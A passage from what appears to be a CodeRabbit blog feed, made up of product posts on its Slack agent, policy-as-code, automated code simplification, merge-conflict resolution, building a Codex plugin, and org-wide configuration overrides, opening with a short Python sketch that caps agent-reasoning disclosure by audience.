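    MODEL_REASONING = 4  # chain-of-thought at inference time


# Hypothetical caps: how deep each audience is allowed to drill.
MAX_LAYER_BY_AUDIENCE = {
    "end_user": Layer.DECISION_TRACE,
    "support": Layer.DECISION_TRACE,
    "developer": Layer.MODEL_REASONING,
    "compliance": Layer.MODEL_REASONING,
}


@dataclass
class AgentRun:
    # One rendered explanation per layer, produced by the agent run.
    content: dict[Layer, str] = field(default_factory=dict)

    def disclose(self, audience: str, requested: Layer = Layer.OUTCOME) -> dict[Layer, str]:
        """Return layers 0..requested, capped at the audience's maximum depth."""
        # Unknown audiences only ever see the outcome.
        cap = MAX_LAYER_BY_AUDIENCE.get(audience, Layer.OUTCOME)
        depth = min(requested, cap)
        return {layer: text for layer, text in self.content.items() if layer <= depth}
```

The default request is Layer 0, so the headline surface stays compressed, and a deeper request (the one-click "why?") only goes as far as the audience's cap. That keeps the "show logs" toggle from being the only dial.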

How to get the most value from CodeRabbit Agent for Slack

David Kravets — Thu, 07 May 2026 00:00:00 GMT

Most teams want a capable teammate in Slack, one that takes real work off their plate, operates in the flow of conversation, and helps people move from question to action without forcing everyone to swivel between tools all day.

That is the real opportunity with [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent). Used with intention, it becomes a shared operational layer for your engineering organization. It's part coding assistant, part research partner, part triage operator, part execution engine and, at its core, it brings the same intelligence that powers CodeRabbit's code review engine to every stage of the software development lifecycle.

That means engineers get help debugging and shipping, managers get visibility into what changed and why, support teams can investigate escalations without waiting on someone to context-switch, and product managers can understand implementation implications before they file a ticket. In short, the full range of what it can do across agentic SDLC workflows goes well beyond any single role or use case.

**The teams that get the most value are the ones that connect it to the right systems, establish clear norms, and build habits that compound over time.**

## **Start with the right mental model**

The biggest shift is this. CodeRabbit Agent for Slack is built for the full arc of software delivery, well beyond writing code:

* An engineer needs help editing a file or navigating an unfamiliar module
* A support lead needs to triage a bug without waiting on a senior engineer
* A product manager wants a concise readout of what changed in the last release
* An incident manager needs fast context on a system behaving badly

Some of the highest-leverage workflows have nothing to do with direct implementation at all.
The agent can run daily end-to-end smoke tests and post pass/fail results to Slack every morning, automatically open pull requests for weekly dependency updates grouped by patch, minor, and major versions, and query your observability stack each morning to deliver a severity-rated health digest before standup.

But the agent is equally powerful in the moment. A product manager mid-meeting wants to know how a freshly launched feature is performing. She opens a Slack thread, asks the agent to pull a specific dashboard, and within seconds has a count of users who have adopted the feature since launch. The answer arrives in the thread where the conversation is already happening, instantly accessible to everyone in the room, with zero interruption to the people building the product.

The common thread is this. The agent handles repeatable operational work and live knowledge requests alike, so the team can focus on decisions that actually require human judgment. The value compounds across every stage of building and operating software with more shared context, less friction, and faster decisions.

## **Connect the systems that matter**

The agent earns its keep through the breadth of context it can reach. CodeRabbit Agent for Slack pulls from an unusually wide surface. This includes code repositories and open pull requests, issue trackers like Jira, Linear, and GitHub Issues, documentation in Notion or Confluence, monitoring data from Datadog, Sentry, and PostHog, cloud infrastructure context from AWS and GCP, and Slack itself. The connections ecosystem grows pretty much every day.

From Slack itself, the agent pulls in the conversations, decisions, escalations, and handoffs that represent your team's actual working memory. Teams can extend it further through MCP servers and direct API connections.
![UI displaying 'Add connection' with various integrations like Notion, Jira, Datadog, and Figma.](https://victorious-bubble-f69a016683.media.strapiapp.com/00_b275145b0b.png) That breadth matters because a support question is rarely just a support question. It often touches product behavior, recent releases, internal docs, feature flags, and ownership boundaries. The more of that graph the agent can traverse safely, the more it can help people resolve real work instead of offering generic suggestions. The smartest rollout starts focused, with code repositories, documentation, ticketing, and read-only observability or incident data first. Expand from there once the team sees where the agent is already proving valuable. ## **Set access intentionally and roll out in phases** Good adoption starts with trust, and trust starts with clear boundaries. ![Dark UI displaying page creation settings for general, content types, languages, layouts, and SEO.](https://victorious-bubble-f69a016683.media.strapiapp.com/01_620f57363b.png) Begin with the narrowest access model that still produces useful outcomes. Read-only access alone unlocks substantial value such as code understanding, issue triage, incident context, change summaries, documentation lookups, and planning help. Write capabilities come next, introduced deliberately as the team grows comfortable with how the agent behaves. CodeRabbit's governance runs through scopes. They are bundles that define which repositories the agent can reach, which integrations it can use, which users can invoke it, and what spending limits apply. Every workspace starts with a base scope, with full attribution and auditability for every agent run. A phased rollout works best. Start with a small pilot group, connect a focused set of tools, observe how people naturally use it, then expand based on real usage patterns. 
This gives the team time to establish norms, identify high-value workflows, and sharpen any review or approval expectations before the agent becomes part of daily operating rhythm. ## **Build for the team, not the individual** One of the most powerful properties of a Slack-native agent is that Slack is inherently multiplayer. Questions are asked in public. Context accumulates. Decisions need to be visible. Handoffs happen across functions. ![Slack message from Harjot Gill asking about weekly documentation drift guard automation.](https://victorious-bubble-f69a016683.media.strapiapp.com/02_8af0def256.png) The most effective teams use CodeRabbit Agent for Slack in shared channels and threads whenever the work benefits from collective visibility. Bug triage, incident response, release readiness, spec clarification, customer issue investigation, and architectural Q\&A all get sharper when the agent's reasoning is visible to everyone involved. That visibility reduces duplicate work, makes decisions easier to audit, and means the agent's output becomes reusable. That means new team members can read an incident summary later, other functions can reference a technical explanation without asking the same questions again, and engineers stop reconstructing the same context from scratch. ## **Establish channel and thread norms early** Structure turns a powerful agent into a predictable one. Decide early where different classes of requests belong. **Engineering channels** are a natural home for code understanding, PR context, and release questions. **Support channels** work well for customer issue triage because the agent can pull context from your CRM, support tickets, issue trackers, documentation, and past conversations into a single thread. **Incident channels** are where the agent earns some of its highest leverage by assembling timelines, summarizing logs, identifying recent changes, and proposing next debugging steps from the same thread where the alert fired. 
**Product and planning channels** can use it for issue scoping, roadmap decomposition, or turning a messy conversation into a clean technical plan the team can review before anyone starts coding. Thread discipline matters equally. Keep each request scoped to a thread so that relevant context stays together, the conversation remains easy to follow, and future readers can understand what was asked, what evidence was gathered, and what decision was made. ## **Put CodeRabbit Agent for Slack to work across the full software lifecycle** The highest-leverage usage spans the entire lifecycle of building and operating software. The teams that discover this early pull ahead quickly. ![A dark mode chat conversation discussing user data for an Extension Adoption Dashboard.](https://victorious-bubble-f69a016683.media.strapiapp.com/03_a23f1ab179.png) Before work starts, the agent clarifies requirements, breaks down ambiguous requests, inspects the codebase for likely touchpoints, and surfaces risks that would otherwise emerge much later. During implementation, it helps developers navigate unfamiliar modules, compare approaches, and reproduce customer bugs from tickets. For example, paste an issue into Slack, the agent reproduces it in a browser, and returns a screen recording with filed repro steps. During review and release, it summarizes what changed, identifies likely regressions, and generates changelogs grouped by features, fixes, and improvements. After release, it supports incident response, root-cause exploration, and keeps documentation in sync with what was actually shipped. ## **Set clear expectations around human review** The place to establish where human judgment stays in the loop is before the agent starts opening pull requests, drafting operational recommendations, and interacting with production systems. Anything that mutates production systems, changes critical code, or creates external-facing commitments warrants human approval before it moves forward. 
This is how mature teams hold velocity and control at the same time. The healthiest model is calibrated trust. Let the agent gather context quickly, compress large amounts of information, propose concrete next steps, and execute across the tools the team already uses. All the while, humans own the judgment calls, prioritization, and final approval where it counts. ## **Launch with real use cases, build from there** Teams adopt tools because the tool solved a problem they felt this week, and the best rollouts lean into that scenario. Introduce CodeRabbit Agent for Slack through a handful of concrete workflows that matter immediately. This may include production issue investigation, support escalation triage, codebase questions, PR understanding, release summaries, or technical onboarding. Pick the ones that are common, expensive, and easy to recognize. Once people see the agent reduce time-to-answer or take real work off a teammate's plate, adoption takes care of itself. And bring the whole organization along. Product managers use it to understand implementation implications before filing work. Support teams use it to gather technical context before escalating. Engineering managers use it to summarize changes and understand blockers. Incident managers use it to speed up context assembly during active response. The agent becomes most valuable when the entire delivery organization operates more coherently around the same systems and the same work. That is where the real leverage lives. Ask it for one-off answers and you capture a fraction of CodeRabbit Agent for Slack value. Instead, weave it into the collaborative fabric of how work gets understood, advanced, reviewed, and completed. That’s how the whole organization moves faster.

Policy-as-code: The missing layer in AI-assisted development

David Kravets — Tue, 05 May 2026 00:00:00 GMT

Engineering teams have standards. The problem is that many of those standards still live in wikis, onboarding docs, architecture pages, and reviewer memory. Somewhere, there is guidance on how services should communicate, what tests should accompany a risky change, which dependencies are acceptable, and what good pull requests look like. Senior engineers know the patterns. Experienced reviewers can usually tell when something feels off. Newer team members learn the rules by absorbing comments, examples, and a fair amount of folklore. For a long time, teams could get by with that. It was imperfect, but workable. As code production shifts from manual to generated, the cost of staying there compounds quietly. Standards erode faster than anyone updates the wiki. Review comments relitigate the same decisions quarter after quarter. The gap between what the architecture diagram says and what the codebase actually does grows wider with every sprint. Standards must move from tribal knowledge to enforceable guardrails, and the window to make that shift is closing faster than most teams realize. ## The disease, not just the symptom Consider a familiar pull request: a team adds a direct read from the billing database to power a support workflow more quickly. The code passes tests. The feature works. One reviewer sees a pragmatic shortcut. Another sees an architecture violation. A third never notices the boundary issue at all. If the team's standard is "use approved service interfaces instead of reaching across domains directly," but that standard only exists as prose and memory, then enforcement becomes a matter of who happens to review the change that day. That has always been a problem. What has changed is the scale. Every engineer now runs a private coding agent, on their own machine, in sessions nobody else can see. The agent starts each morning knowing nothing. 
Whatever reasoning was assembled yesterday, whatever alternatives were weighed, whatever decisions were made in standups — gone. The developer's first task every morning is to reconstruct context that already exists somewhere in the organization and paste it into a window that resets at the end of their day. The result is faster drift, not just faster code. Human teams lose coordination over weeks. AI teammates lose it within a single workday, and the industry calls it high productivity. A lot of what organizations call "engineering standards" are good intentions, nothing more. Only as durable as the reviewer who remembers them, and now only as durable as the context a developer remembered to paste into an agent session that morning. ## The wrong intervention The instinct is to fix this at the pull request level, to catch violations at the gate, add more review steps and write better templates. That is fighting the problem at the wrong end. Enforcement at the PR stage catches violations after the fact. The better intervention is making sure the agent understands the rules before writing a single line. Give an agent a codebase with no context and the output is plausible-looking code that misses every convention the team spent two years establishing. Give the same agent the codebase plus architectural decisions, ticket history, on-call runbooks, and the Slack thread where the team decided to deprecate the old auth service, and the output looks like a teammate wrote it. Right now, developers manually assemble that context every single session, acting as interpreters between their own engineering org and a tool that should already know. That is the gap. Not the model. Not the PR template. The missing layer is a durable, shared context that governs what the agent knows before work begins. Many teams reach for a shared wiki or a project-level file the agent ingests at the start of each session. It is better than nothing, but not by as much as it seems. 
Documentation is a photograph of what the team knew at the moment someone sat down to write it. In an engineering organization moving fast, that moment recedes quickly, and what fills the gap between the last update and today is exactly the context that matters most and gets captured least. ## What solving it looks like [CodeRabbit Agent for Slack](https://www.coderabbit.ai/agent) is built around that premise. Rather than a per-developer, per-session tool that starts cold, it brings the agent into the place where the team already coordinates, covering the core loop of planning, code generation, review, and investigation, with context that persists and compounds across sessions. Every code review, resolved ticket, and architectural discussion feeds a shared knowledge layer so the agent arriving at a new task already understands the conventions, the deprecations, and the decisions that never made it into a doc. Work is visible, commentable, and resumable by anyone on the team, rather than trapped in one engineer's browser tab or wiped when they close a terminal. That shared foundation is what makes policy enforceable rather than merely aspirational. Structure, however, still matters. ## From beliefs to a policy stack Longer documents are not the answer. What teams need is a lightweight policy stack. Principles explain the intent. Rules define the expected behavior. Automated checks verify the repeatable parts. Escalation paths handle ambiguity and exceptions. Each layer matters. Principles keep teams from enforcing rules mechanically without understanding why they exist. Rules make principles concrete enough to apply. Automated checks reduce the burden on reviewers by catching the obvious and repeatable cases. Escalation preserves room for judgment when the situation is genuinely unusual. Drop one of those layers and the system weakens. ## What this looks like in practice Take architectural boundaries. 
A principle like "preserve clear ownership and service boundaries" is useful but too abstract to guide review consistently. Turn it into rules: services must access another domain through the published API, not the backing datastore; new imports from restricted internal modules are prohibited; cross-domain write paths require approval from designated owners; shared libraries must not absorb business logic that belongs to one service. ![Dark mode UI for project creation, showing fields for name, URL, build steps, and settings.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_05_05_at_16_36_13_1d5908ca30.png) Now the standard is operational. Some parts can be checked automatically. A bot can detect prohibited imports. CI can flag new dependency edges. A review agent can notice that a pull request touches a sensitive path and request additional reviewers. The rest goes to escalation: if a team has to bypass the policy temporarily, the pull request should say so plainly, stating what rule is being bypassed, why, who approved it, and when the exception will be revisited. The same pattern applies to dependency hygiene. “Minimize dependency risk” becomes useful when turned into rules. New runtime dependencies must justify their presence. Packages must show active maintenance, and anything that duplicates existing capability must explain why. Tooling can support those rules. But a PR structure that makes the decision visible and consistently evaluated is what gives them teeth. There is a simple test every team should run against its architectural intent. Could a new reviewer apply this consistently? Could a tool verify at least part of it? If the answer to both is no, rewrite the standard. ## Exceptions are necessary. Hidden exceptions are corrosive. One reason teams resist more explicit policy is fear of rigidity. That concern is understandable. Emergencies happen. Migrations create awkward tradeoffs. 
Platform limitations force temporary compromises. Unmanaged exceptions are exactly how standards erode. A healthy exception process makes the bypass visible and meaningful without turning it into an empty ceremony. The best ones are explicit, justified, approved, and time-bound. They leave a trace. That trace matters. If the same exception keeps appearing, the standard may be poorly designed, the platform may be missing a capability, or the architecture may have drifted from reality. Exceptions should not just be tolerated. They should teach something. Without that loop, teams create policy theater: rules everyone treats as firm in principle, exceptions everyone handles informally in practice, and review processes that signal rigor without reliably producing it. ## The control surface has changed Code review used to be primarily a social mechanism: collaboration, mentorship, style feedback, and a little quality control. That model is no longer sufficient. The pull request is now a primary control surface for engineering quality, architectural consistency, and risk management. The moment when the organization decides what enters production and under what conditions. But one point in a much longer chain. Individual productivity from coding agents is up across every team adopting AI. Team-level productivity is stuck, because there is no shared record of what the agent actually did, no visibility into what systems it touched, and the agent does not live where engineering actually happens. Solve those, and team productivity starts to compound the way individual productivity already has. The agents that win will be the ones that already know your systems when you open them: the conventions, the deprecations, the decisions that never made it into a doc. Policy-as-code is how you give them that foundation. 
That is the bet behind CodeRabbit Agent for Slack: an agent that carries your team's institutional memory into every session, governs work in the open where teammates can see it, and compounds knowledge rather than resetting it. Planning, generation, review, and investigation, all in the place where your team already works, with your standards already loaded. If a standard cannot shape what the agent builds, it is a suggestion. Nothing more.
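
As a rough illustration of the "automated checks" and "escalation" layers of the policy stack, here is a minimal Python sketch of the prohibited-import check mentioned earlier, paired with a time-bound exception record. Everything named here is hypothetical: the `billing.db` prefix, the `PolicyException` fields, and the `check_file` helper are assumptions for the example, not CodeRabbit configuration or API.

```python
import ast
from dataclasses import dataclass
from datetime import date

# Hypothetical rule: other domains must not import the billing datastore module.
RESTRICTED_PREFIXES = ("billing.db",)


@dataclass
class PolicyException:
    """An explicit, justified, approved, and time-bound bypass."""
    rule: str
    path: str
    reason: str
    approved_by: str
    expires: date

    def covers(self, path: str, today: date) -> bool:
        return self.path == path and today <= self.expires


def imported_modules(source: str) -> set[str]:
    """Collect absolute module names imported by a piece of Python source."""
    modules: set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            modules.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            # "from billing import db" should also surface "billing.db".
            modules.add(node.module)
            modules.update(f"{node.module}.{alias.name}" for alias in node.names)
    return modules


def is_restricted(module: str) -> bool:
    return any(module == p or module.startswith(p + ".") for p in RESTRICTED_PREFIXES)


def check_file(path: str, source: str, exceptions: list[PolicyException], today: date) -> list[str]:
    """Return violation messages unless a live exception covers this file."""
    if any(exc.covers(path, today) for exc in exceptions):
        return []
    return sorted(
        f"{path}: imports restricted module '{m}'"
        for m in imported_modules(source)
        if is_restricted(m)
    )
```

The design choice worth noting is that the exception carries an expiry date: once it lapses, the same check starts failing again, which is what keeps a temporary bypass from quietly becoming permanent. Relative imports are ignored in this sketch.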

Be honest about that "I'll clean it up later" comment

Konrad Sopala — Mon, 04 May 2026 00:00:00 GMT

You finished the feature, tests passed, PR's up. There is one function that is doing too much. That conditional could be tighter and there's a duplicate block that's begging to be a helper.

The thing is, it's 5pm. You've got standup notes to write and two PRs to review. The cleanup gets a `TODO` and a quiet promise to come back to it. You know how that ends. Always.

## Meet Simplify Code

[Simplify Code](https://docs.coderabbit.ai/finishing-touches/simplify) reviews the files you changed in a PR and applies targeted improvements (extracting reusable functions, simplifying conditionals, removing redundant code and so on) without changing behavior. One comment and the cleanup pass actually happens.

%[https://youtu.be/rUIWSQN-xLQ]

## How it works

You can either **comment** *@coderabbitai simplify* in the pull request thread or check the **Simplify code** box in the CodeRabbit walkthrough comment.

## What happens when you trigger it

Here's what that looks like:

* **Sandbox clone:** CodeRabbit clones your repo into a sandbox and diffs the PR branch against the base to identify every changed file.
* **Targeted edits:** an AI agent reads each changed file and applies focused improvements: extracting helpers, collapsing redundant logic, tightening conditionals (behavior stays the same).
* **Verification:** the agent runs your existing test suite to confirm nothing broke.
* **Delivery:** the agent opens a new PR with the simplified code or commits it directly to your existing branch.

The whole process can take up to 20 minutes depending on PR size.

## What Simplify Code won't touch

It stays in the cleanup lane. It won't:

* Change public APIs or rename exported symbols
* Alter test assertions
* Refactor code outside the files changed in your PR

If your test suite fails after the changes, it still delivers them so you can inspect, fix or discard.

## Try it out

CodeRabbit’s Simplify Code feature is available on the Pro+ plan, on GitHub.
Next time you ship a PR and feel the itch to come back and clean it up, don't bookmark it. Drop a comment. [**Get started with CodeRabbit**](https://coderabbit.link/Q5oy5FI)
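To make "without changing behavior" concrete, here is a hand-written before/after of the kind of cleanup described above: a duplicated block pulled into a helper and a nested conditional flattened. It is a hypothetical illustration, not output from Simplify Code, and the function names and rates are made up.

```python
def shipping_cost_before(order):
    """Original version: the rounding block is repeated in every branch."""
    if order["country"] == "US":
        if order["weight_kg"] > 10:
            cost = order["weight_kg"] * 1.5
            cost = round(cost, 2)
            return cost
        else:
            cost = order["weight_kg"] * 1.0
            cost = round(cost, 2)
            return cost
    else:
        cost = order["weight_kg"] * 2.5
        cost = round(cost, 2)
        return cost


def _rate_per_kg(country, weight_kg):
    """Extracted helper: the only thing the branches really disagreed on."""
    if country != "US":
        return 2.5
    return 1.5 if weight_kg > 10 else 1.0


def shipping_cost_after(order):
    """Simplified version: same inputs, same outputs, one code path."""
    rate = _rate_per_kg(order["country"], order["weight_kg"])
    return round(order["weight_kg"] * rate, 2)
```

The public function keeps its signature and its results, which is why an existing test suite can act as the safety net for a pass like this.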

Introducing Resolve Merge Conflicts

Konrad Sopala — Thu, 30 Apr 2026 00:00:00 GMT

You're about to merge. Everything's green. Then GitHub hits you with: *"This branch has conflicts that must be resolved."*

Here’s what you do next:

* Pull main
* Switch branches
* Open the conflicting files
* Try to remember what the other dev was even doing in this code
* Mash some lines together, hoping nothing breaks
* Push and pray for the CI

The conflict markers are noise around code that wasn't really fighting in the first place. So why are you still stuck in the weeds for this?

## Meet Resolve Merge Conflicts

%[https://youtu.be/VdvnzdafLp0?si=gglnblGB-r3c5je5]

When CodeRabbit detects conflicts in your PR, [Resolve Merge Conflicts](https://docs.coderabbit.ai/finishing-touches/resolve-merge-conflict) can fix them for you - reading the intent behind both sides, figuring out the right unified outcome, and committing it as a proper merge commit on your branch. It’s available on both GitHub and GitLab on the CodeRabbit Pro Plus plan.

Here’s what that looks like.

### The old manual way

Before, you probably stopped what you were doing, switched branches and manually reconciled someone else's changes with yours. After all that, you re-ran CI and hoped you didn't miss anything subtle.

### The new way with one comment

You comment, CodeRabbit resolves and the merge commit lands on your branch with both parents intact.

## How it works

There are two ways to use this feature.

### Comment in the PR

In the PR thread, just comment:

![A dark terminal window showing the command '@coderabbitai resolve merge conflict' with window control dots.](https://victorious-bubble-f69a016683.media.strapiapp.com/carbon_1_161e79fc57.png)

### Checkbox in the PR walkthrough

On GitHub, when CodeRabbit detects conflicts during review, it adds a Resolve merge conflicts checkbox right inside the walkthrough comment. Just tick it.

Both routes commit the resolved changes directly to your branch.

## What happens when you trigger it?

When resolution runs, here's what's happening under the hood:

* **Detection:** during PR review, CodeRabbit simulates the merge in a sandbox and lists any conflicts in the summary comment. Your working tree stays untouched.
* **Intent analysis:** for each conflicting file, the agent reads both branches and works out *why* each side made the changes it did, not just *what* changed.
* **Resolution:** an AI agent reasons through each conflict from first principles. It works directly inside the repo, inspecting git state, reading files, running git commands, editing code. It can make changes beyond the conflict hunks if the right outcome requires it.
* **Validation:** it checks that no conflict markers remain and that the merge index is clean, then runs your repo's build and lint to surface any errors introduced by the resolution.
* **Commit:** the result lands as a proper merge commit with two parents (your branch and the base branch), so your git history reflects what actually happened.

## When it’s extremely useful

Remember the last time you were on GitHub and a pull request had conflicts that were too complex for the web editor to resolve? With the **Resolve Merge Conflicts** feature, you will no longer be stopped by the error message: *use the command line to resolve conflicts before continuing*.

## When CodeRabbit won't auto-resolve

In two cases, the agent will decline a resolution rather than guess, because a wrong guess could cause real harm:

* **Security-critical code:** Auth logic, encryption, secrets handling, access control. Wrong calls here are too costly to gamble on.
* **Fundamentally incompatible business logic:** Where both sides made architectural decisions that contradict each other and a human needs to weigh in.

When it declines, the entire attempt is aborted so there are no partial commits or half-resolved files. You get a comment naming the file and the specific reason. The bar for declining is intentionally high, so the vast majority of conflicts get resolved automatically.

## **Try it out**

Resolve Merge Conflicts is in open beta on the Pro Plus plan, available on GitHub and GitLab. Next time you have a conflict, don't switch branches. Drop a comment in the PR and watch your merge conflicts disappear.

[Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)
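One of the validation checks listed earlier, confirming that no conflict markers remain, is easy to picture in code. The sketch below is a minimal, assumed version of such a check and not CodeRabbit's implementation; `find_conflict_markers` is a hypothetical helper name. It treats a bare `=======` line as a marker only when it sits inside an open conflict block, so Markdown or reStructuredText underlines are not flagged.

```python
import re

# Marker lines git writes around an unresolved hunk.
_OPEN = re.compile(r"^<{7}( |$)")
_MID = re.compile(r"^={7}$")
_CLOSE = re.compile(r"^>{7}( |$)")


def find_conflict_markers(text):
    """Return 1-based line numbers of leftover conflict markers in text."""
    hits = []
    inside = False  # True between an opening and a closing marker
    for lineno, line in enumerate(text.splitlines(), start=1):
        if _OPEN.match(line):
            inside = True
            hits.append(lineno)
        elif _CLOSE.match(line):
            inside = False
            hits.append(lineno)
        elif inside and _MID.match(line):
            hits.append(lineno)
    return hits
```

An empty result for every file touched by the merge is a necessary condition for a clean resolution, not a sufficient one, which is why the build and lint step still matters.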

How we built the CodeRabbit plugin for Codex

Juan Pablo Flores — Tue, 28 Apr 2026 00:00:00 GMT

When we started working on the [CodeRabbit plugin for Codex](https://www.coderabbit.ai/blog/coderabbit-plugin-for-codex), the goal was not to package as many features as possible. It was to make one workflow feel natural. A developer asks for review, the agent handles setup and execution, and the feedback comes back inside the same working session. We wanted that experience to live inside the surfaces where developers are already coding, so review becomes something they reach for in the moment rather than a separate step they have to context switch into. Getting there required more than writing a short set of instructions. We had to decide what belonged in the plugin, how much of the workflow the agent should own, and how explicit we needed to be about model behavior for the experience to stay reliable. ![Flowchart showing Before and After code review workflows, from external steps to inline feedback.](https://victorious-bubble-f69a016683.media.strapiapp.com/context_switch_vs_seamless_6b136968fe.svg) ## **Start with the workflow** We started with the user outcome, not the package structure. The question was straightforward: what should become easier once the plugin is installed? For us, the answer was that code review should feel like part of the coding flow itself. A developer should be able to ask Codex to review the current changes, or use `@coderabbit` to invoke the plugin directly, and get a useful result without manually checking setup, switching tools, or reconstructing the right review command. That workflow gave us the shape of the plugin. Instead of designing around a long list of capabilities, we designed around a narrow job to be done and then asked what the agent needed to do that job well. The more of that loop we could keep inside the place where developers were already coding, the more we could reduce context switching, shorten review cycles, and make code changes cheaper to apply. 
## **Build with focused skills**

From there, we built focused skills around the core review experience. The code review skill does the heavy lifting. It verifies that the [CodeRabbit CLI](https://coderabbit.ai/cli) is available, checks authentication, chooses the right review target, runs the review, and summarizes findings by severity.

Splitting the workflow into focused skills was an important design choice. One giant instruction file might seem simpler at first, but it quickly becomes harder to maintain and harder for the model to use consistently. Focused skills keep the behavior clearer, make iteration easier, and give us a cleaner way to add new workflows over time.

![A diagram comparing a single large instruction file to a modular plugin approach with focused skills.](https://victorious-bubble-f69a016683.media.strapiapp.com/monolith_vs_focused_skills_ba3076e9f1.svg)

**The plugin system's core advantage is that it lets you compile skills, MCP servers, and connectors into a single installable unit.** For teams building developer tools or services, that is a meaningful improvement to the experience of the people consuming your work inside the Codex app. Instead of asking users to discover, install, and remember the name of each individual skill, you can ship everything together in one plugin. The model then decides when to bring each skill into the conversation where it provides the most value.

**That reduces cognitive load for developers and makes the whole experience feel more intentional.** As we add new [CodeRabbit skills for Codex](https://docs.coderabbit.ai/cli/codex-integration), users get them through the plugin instead of returning to install one skill at a time. A good plugin does not have to be large. It has to make one important workflow easier, then create a clean path to expand from there.

## **Design for real model behavior**

The most important part of the work was not the packaging itself.
It was learning how to write skill instructions that guide the model toward the behavior you actually want. Every plugin builder will go through a version of this process, so here are the lessons that made the biggest difference for us. **Be explicit about tool choice.** Models are resourceful, and that resourcefulness can work against you if the skill does not set clear boundaries. Early on, we noticed Codex reaching for Python when the workflow only needed a direct CLI command. It would wrap CodeRabbit in a script, add layers around simple terminal actions, or introduce setup steps that were not needed. Once we made the skill instructions specific, telling the model to run `coderabbit` directly as a bare shell command and not to use Python wrappers, the behavior became consistent. The lesson: if your plugin depends on a particular tool, say so clearly and close the door on alternatives the model might improvise. **Handle authentication as a first class concern.** When the CodeRabbit CLI was not yet authenticated, the model would try to solve that on its own rather than following the guided path we had built. It might skip the auth step, guess at credentials, or improvise a workaround that looked reasonable but did not actually sign the user in. We initially tried using the authentication flags that the Codex team provides in their documentation, but in our experience and from the developers testing it, we did not see meaningful changes in behavior when we implemented them. It is possible we configured something incorrectly, but the approach that actually made the difference was handling it ourselves in the skill: check authentication status early and, when the user is not signed in, fall back to a step by step flow that walks them through setup. That one change eliminated most of the unpredictable behavior we were seeing on first runs. 
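The first two lessons, run the tool directly and check authentication before anything else, describe a control flow that can be sketched in a few lines. This is an illustrative sketch under assumptions, not the plugin's actual skill: `run_review` is a hypothetical function, and the auth-check and review commands are passed in by the caller because the exact CLI invocations are not specified here.

```python
import shutil
import subprocess


def run_review(cli_name, auth_check_cmd, review_cmd):
    """Auth-first review flow; every command is supplied by the caller."""
    # Step 1: make sure the tool itself is available before doing anything.
    if shutil.which(cli_name) is None:
        return {"status": "needs_install", "detail": f"{cli_name} not found on PATH"}

    # Step 2: check authentication early. A non-zero exit code is treated as
    # "not signed in" (an assumption of this sketch), and the caller falls
    # back to a guided setup flow instead of improvising.
    auth = subprocess.run(auth_check_cmd, capture_output=True, text=True)
    if auth.returncode != 0:
        return {"status": "needs_auth", "detail": "walk the user through sign-in"}

    # Step 3: run the review as a bare command (an argv list, no shell and
    # no wrapper script), mirroring the "be explicit about tool choice" rule.
    review = subprocess.run(review_cmd, capture_output=True, text=True)
    if review.returncode != 0:
        return {"status": "error", "detail": review.stderr}
    return {"status": "done", "detail": review.stdout}
```

Returning a small status dictionary keeps each outcome explicit, so the caller always knows whether to guide setup, report an error, or summarize findings.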
![Flowchart illustrating a review process with authentication, setup flow, and summarization of findings.](https://victorious-bubble-f69a016683.media.strapiapp.com/auth_first_flow_260edec32a.svg) **Set expectations for long running tasks.** CodeRabbit can take time to analyze a larger set of files, and without guidance the model can interpret that delay as a sign something has stalled. We saw it stop early, retry too quickly, or move into a fallback path before the review had actually finished. The fix was to be explicit about patience in the skill: let the review run, wait through the full timeout window, and only narrow the scope after a genuine timeout rather than treating normal latency as a failure. If your tool has operations that take more than a few seconds, building that expectation into the skill makes a real difference. **Guide communication style.** During long tasks, the model tends to narrate every step, repeat that it is still waiting, and send updates that add more noise than reassurance. Users want to know the plugin is working, but they do not want a stream of status messages competing for their attention. We addressed this by telling the model to stay quiet during reviews and only speak when user input is needed, the review is complete, or an error requires attention. The result was a calmer, more professional experience that users consistently preferred. **Design for both the app and the CLI.** We initially built the plugin for the Codex app, and when we moved to testing it in the CLI we noticed different patterns emerging. One of the major benefits of the Codex app is its ability to render UI directly. Codex can display markdown, tables, and richer formatting that makes review findings easy to scan. But the CLI does not render tables or more complex UI components the same way, and what looked clean in the app became harder to read in the terminal. We had to go back to simpler primitives to make sure the output worked well in both environments. 
If you are building a plugin that will run across the Codex app and the CLI, it is worth testing both early and designing your output around the more constrained surface first. ## **What we would recommend to other builders** If you are building your own Codex plugin, start with the user outcome and work backward from there. Ask what should become easier once the plugin is installed, then define the smallest set of skills that supports that outcome well. The lessons above on tool choice, authentication, patience, and communication style all came from that same process of working backward from the experience we wanted and then writing the skill instructions to get there. **The Codex app includes a create plugin skill** that can help you scaffold the structure and get everything set up. It is a useful way to get moving without assembling the pieces from scratch, and it gives you a working starting point that you can iterate on as you learn how the model responds to your specific workflow. The technical integration is only one layer of the work. The deeper design challenge is deciding what the model should do by default so the experience feels intentional from the first run. ## **What comes next for CodeRabbit Codex plugin** This first version gives us a base to keep expanding the CodeRabbit experience in Codex. We plan to keep improving how review feedback flows back into the agent, add new skills over time, and continue tightening the first run experience so users reach value faster. One of the ideas the team is most excited about is exploring how to use not only the context of the code itself but also the conversation context that Codex provides through the messages a developer has exchanged during the session. 
That history carries a lot of signal about the intention behind a set of changes, and feeding that into the review could help CodeRabbit deliver feedback that is more aligned with what the developer is actually trying to accomplish rather than reviewing the code in isolation. If you want to try the plugin, head to the announcement post for installation steps. If you are building your own, we would love to see what you create. Share it with us in the [CodeRabbit subreddit](https://www.reddit.com/r/coderabbit/) or the [CodeRabbit Discord](https://discord.com/invite/coderabbit).

Introducing Global Overrides

Konrad Sopala — Mon, 27 Apr 2026 00:00:00 GMT

You roll out a new review policy. Maybe it's a required path instruction for every SQL file. Maybe it's a stricter review profile for anything touching auth. You document it, send the Slack message and slot it into onboarding.

Three months later you go look: half the repos have it, a quarter have their own version and the rest quietly opted out by tweaking their `.coderabbit.yaml`.

Every admin has lived this. Config drift isn't a bug, it's what happens when dozens of teams own their own config files.

## Meet Global Overrides

[Global Overrides](https://docs.coderabbit.ai/guides/configuration-overview?#global-overrides) let org admins enforce configuration settings across every repository and every PR review in the organization - regardless of what individual repos have in their `.coderabbit.yaml`, their repo-level UI settings or anywhere else.

## How to set it up

